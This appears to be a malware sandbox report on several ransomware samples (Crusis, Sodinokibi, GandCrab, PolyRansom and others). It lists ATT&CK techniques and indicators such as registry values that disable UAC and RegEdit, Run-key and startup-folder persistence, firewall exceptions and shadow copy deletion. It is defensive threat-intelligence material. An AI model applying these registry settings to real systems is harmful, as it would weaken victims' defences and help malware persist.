azorult | 4fb064cdac599ae9c745c8daaf959eaa593482b730a3cc222ac9bad0f34b4743

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe"	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe"	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe"	lurwhzlcveb.exe

Modifies firewall policy service 3 TTPs 4 IoCs

Modify Registry

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	tpvpyme.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	tpvpyme.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	tpvpyme.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\tpvpyme.exe = "C:\\Users\\Admin\\Desktop\\00378\\tpvpyme.exe"	tpvpyme.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

Hidden Files and Directories

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "2"	tpvpyme.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Smokeloader family
smokeloader
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Sodinokibi family
sodinokibi

UAC bypass 3 TTPs 13 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	ajhqekm.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (515) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Renames multiple (524) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Adds policy Run key to start application 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "njuqrkzslgwouicdyyjf.exe"	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\njuqrkzslgwouicdyyjf.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "gzhayoaqgyladofdv.exe"	ajhqekm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "zryqncncriuikukh.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\njuqrkzslgwouicdyyjf.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "avfaasgyqkzqvibbvue.exe"	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "zryqncncriuikukh.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe"	ajhqekm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe"	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "njuqrkzslgwouicdyyjf.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "njuqrkzslgwouicdyyjf.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe"	lurwhzlcveb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe"	ajhqekm.exe

Disables RegEdit via registry modification 6 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	ajhqekm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	ajhqekm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	ajhqekm.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

pid	Process
5864	attrib.exe

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0008000000023bd8-125.dat	aspack_v212_v242
behavioral1/files/0x0009000000023c8a-203.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	lurwhzlcveb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	tpvpyme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 38 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\soft.lnk.id-7e980581.[[email protected]].bot	taskmgr.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\soft.lnk.id-7e980581.[[email protected]].bot.id-7e980581.[[email protected]].money	taskmgr.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\trojan-ransom.win32.rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7e980581.[[email protected]].bot.id-7e980581.[[email protected]].money	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\trojan-ransom.win32.rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7e980581.[[email protected]].bot	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\info.hta	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\soft.lnk.id-7e980581.[[email protected]].money	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\trojan-ransom.win32.crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe.id-7e980581.[[email protected]].money	taskmgr.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\info.hta	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe

Executes dropped EXE 36 IoCs

pid	Process
468	HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe
4904	HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe
5072	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
1408	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe
672	HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe
4928	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
3936	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
3692	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe
5020	Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe
1776	tpvpyme.exe
3404	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
2004	Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
1652	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
4324	lurwhzlcveb.exe
3188	Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe
4956	Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe
3172	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
4600	Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe
4412	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
2188	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
3472	Sunwin.exe
5072	Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe
4328	ajhqekm.exe
4128	ajhqekm.exe
